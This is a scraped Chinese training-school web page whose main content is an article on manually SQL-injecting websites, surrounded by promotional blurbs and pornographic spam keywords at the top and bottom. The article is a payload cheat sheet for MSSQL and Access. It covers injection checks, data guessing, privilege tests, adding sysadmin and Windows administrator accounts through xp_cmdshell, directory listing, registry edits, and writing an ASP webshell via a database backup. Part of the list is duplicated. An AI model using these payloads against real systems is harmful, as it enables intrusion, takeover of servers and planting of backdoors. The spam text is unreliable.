综合在线激情,xxx国产在线

不僅僅統(tǒng)招學(xué)歷喲

熱門專業(yè)！
大學(xué)校園！
就業(yè)保障！
拿學(xué)歷又能高薪就業(yè)，誰(shuí)能不愛(ài)！

了解詳情>

鄭州北大青鳥翔天信鴿參加“安心學(xué)習(xí)·放心就業(yè)”公約簽約儀式

讓每一個(gè)家庭“安心”、“放心”

教學(xué)為本
師愛(ài)為魂
安心學(xué)習(xí)
放心就業(yè)

了解詳情>

北大青鳥20周年慶典與總部年會(huì)鄭州翔天信鴿榮獲7項(xiàng)榮譽(yù)

深耕細(xì)作IT職業(yè)教育15載

青鳥之星教學(xué)質(zhì)量大獎(jiǎng)
卓越風(fēng)云人物
北大青鳥中心理事會(huì)成員
七項(xiàng)榮耀載譽(yù)而行！

了解詳情>

我們教學(xué)怎么樣

實(shí)力見(jiàn)證
網(wǎng)絡(luò)組一等獎(jiǎng)
網(wǎng)絡(luò)組二等獎(jiǎng)
軟件組四等獎(jiǎng)
200家校區(qū)脫穎而出！

了解更多>

北大青鳥職業(yè)IT20周年

重承諾
守信用
放心品牌
放心學(xué)習(xí)
靠靠譜譜好就業(yè)！

了解更多>

我命由我不由天

學(xué)個(gè)性的技術(shù)
做愛(ài)做的事
掙滿意的錢
衣食無(wú)憂
選擇寬且高大尚！

了解更多>

我們靠不靠譜

14年辦學(xué)
14年磨練
14年成長(zhǎng)
14年探索
只為讓每個(gè)學(xué)員成材！

了解更多>

不打工也牛掰

好工作
好環(huán)境
高薪資
好課程
支持你成為有“錢”人！

了解更多>

學(xué)IT就讀北大青鳥

好工作
好未來(lái)
好老師
好課程
支持你成為受人尊敬的人！

看看黑客如何手工注入方法入侵網(wǎng)站的

作者：北大青鳥添加時(shí)間：04-01 瀏覽次數(shù)：0

我們?cè)谌肭志W(wǎng)站的時(shí)候，有時(shí)候直接靠工具是無(wú)法找到注入點(diǎn)的，所以很多時(shí)候都要用到手工注入，下面列舉一些方法：

1.判斷是否有注入;and 1=1 ;and 1=2

2.初步判斷是否是mssql ;and user>0

3.注入?yún)?shù)是字符’and [查詢條件] and ”=’

4.搜索時(shí)沒(méi)過(guò)濾參數(shù)的’and [查詢條件] and ‘%25′=’

5.判斷數(shù)據(jù)庫(kù)系統(tǒng)

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

6.猜數(shù)據(jù)庫(kù) ;and (select Count(*) from [數(shù)據(jù)庫(kù)名])>0

7.猜字段 ;and (select Count(字段名) from 數(shù)據(jù)庫(kù)名)>0 1.判斷是否有注入;and 1=1 ;and 1=2

2.初步判斷是否是mssql ;and user>0

3.注入?yún)?shù)是字符’and [查詢條件] and ”=’

4.搜索時(shí)沒(méi)過(guò)濾參數(shù)的’and [查詢條件] and ‘%25′=’

5.判斷數(shù)據(jù)庫(kù)系統(tǒng)

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

6.猜數(shù)據(jù)庫(kù) ;and (select Count(*) from [數(shù)據(jù)庫(kù)名])>0

7.猜字段 ;and (select Count(字段名) from 數(shù)據(jù)庫(kù)名)>0

8.猜字段中記錄長(zhǎng)度 ;and (select top 1 len(字段名) from 數(shù)據(jù)庫(kù)名)>0

9.(1)猜字段的ascii值（access）

;and (select top 1 asc(mid(字段名,1,1)) from 數(shù)據(jù)庫(kù)名)>0

(2)猜字段的ascii值（mssql）

;and (select top 1 unicode(substring(字段名,1,1)) from 數(shù)據(jù)庫(kù)名)>0

10.測(cè)試權(quán)限結(jié)構(gòu)（mssql）

;and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘serveradmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘setupadmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘securityadmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’));–

;and 1=(select IS_MEMBER(‘db_owner’));–

11.添加mssql和系統(tǒng)的帳戶

;exec master.dbo.sp_addlogin username;–

;exec master.dbo.sp_password null,username,password;–

;exec master.dbo.sp_addsrvrolemember sysadmin username;–

;exec master.dbo.xp_cmdshell ‘net user username password

/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;–

;exec master.dbo.xp_cmdshell ‘net user username password /add’;–

;exec master.dbo.xp_cmdshell ‘net localgroup administrators username /add’;–

12.(1)遍歷目錄

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree ‘c:\’

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not in(‘上步得到的paths’))>)

(2)遍歷目錄

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–

;insert temp exec master.dbo.xp_availablemedia;– 獲得當(dāng)前所有驅(qū)動(dòng)器

;insert into temp(id) exec master.dbo.xp_subdirs ‘c:\’;– 獲得子目錄列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\’;– 獲得所有子目錄的目錄樹構(gòu)

;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:\web\index.asp’;– 查看文件的內(nèi)容

13.mssql中的存儲(chǔ)過(guò)程

xp_regenumvalues 注冊(cè)表根鍵, 子鍵

;exec xp_regenumvalues ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ 以多個(gè)記錄集方式返回所有鍵值

xp_regread 根鍵,子鍵,鍵值名

;exec xp_regread

‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'CommonFilesDir’ 返回制定鍵的值

xp_regwrite 根鍵,子鍵, 值名, 值類型, 值

值類型有2種REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'TestValueName’,'reg_sz’,'hello’ 寫入注冊(cè)表

xp_regdeletevalue 根鍵,子鍵,值名

exec xp_regdeletevalue ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'TestValueName’ 刪除某個(gè)值

xp_regdeletekey ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’ 刪除鍵,包括該鍵下所有值

14.mssql的backup創(chuàng)建webshell

use model

create table cmd(str image);

insert into cmd(str) values (”);

backup database model to disk=’c:\l.asp’;

15.mssql內(nèi)置函數(shù)

;and (select @@version)>0 獲得Windows的版本號(hào)

;and user_name()=’dbo’ 判斷當(dāng)前系統(tǒng)的連接用戶是不是sa

;and (select user_name())>0 爆當(dāng)前系統(tǒng)的連接用戶

;and (select db_name())>0 得到當(dāng)前連接的數(shù)據(jù)庫(kù)

16.簡(jiǎn)潔的webshell

use model

create table cmd(str image);

insert into cmd(str) values (”);

backup database model to disk=’g:\wwwtest\l.asp’;

文章由鄭州北大青鳥搜集整理，轉(zhuǎn)載請(qǐng)注明！

本文由站河南北大青鳥校區(qū)整編而成，如需了解更多IT資訊類的文章、新聞、課程和學(xué)習(xí)技巧、就業(yè)案例、招生詳情等問(wèn)題，可以對(duì)在線咨詢老師進(jìn)行一對(duì)一問(wèn)答！

熱點(diǎn)資訊

選擇靠譜的學(xué)校

入學(xué)測(cè)試與試聽

體驗(yàn)之后再?zèng)Q定

決定之后要努力

支持你受人尊敬

聯(lián)系電話：400-638-3521/
值班熱線：15225191462(手機(jī))

學(xué)校介紹: 中心簡(jiǎn)介; 青鳥概況; 乘車路線; 校區(qū)環(huán)境

相關(guān)課程: Benet課程; ACCP課程; 軟件課程; 安卓課程

校區(qū)新聞: 校區(qū)新聞; 就業(yè)新聞; 行業(yè)新聞; 媒體新聞; 招生解答

學(xué)員就業(yè): 就業(yè)明星; 就業(yè)感言; 求職技巧

技術(shù)交流: 網(wǎng)絡(luò)技術(shù); 服務(wù)器管理; 數(shù)據(jù)庫(kù); 網(wǎng)絡(luò)安全

精彩專題: 高中生專區(qū); 大學(xué)生專區(qū); 跳槽轉(zhuǎn)行區(qū); 自考生專區(qū)

鄭州北大青鳥翔天信鴿軟件學(xué)院地址：鄭州市文化路90號(hào)河南財(cái)經(jīng)政法大學(xué)文南校區(qū)1號(hào)教學(xué)樓網(wǎng)站地圖乘車路線 - 聯(lián)系我們 - 網(wǎng)站RSS - 河南北大青鳥招聘

豫ICP備10022989號(hào)-1 辦學(xué)許可證號(hào)：1601035000013 豫公網(wǎng)安備 41010502002899號(hào)

分享到：

久久久国产精品,成人无码精品1区2区3区免费看,日韩男人天堂,午夜77777

看看黑客如何手工注入方法入侵網(wǎng)站的

推薦資訊

熱點(diǎn)資訊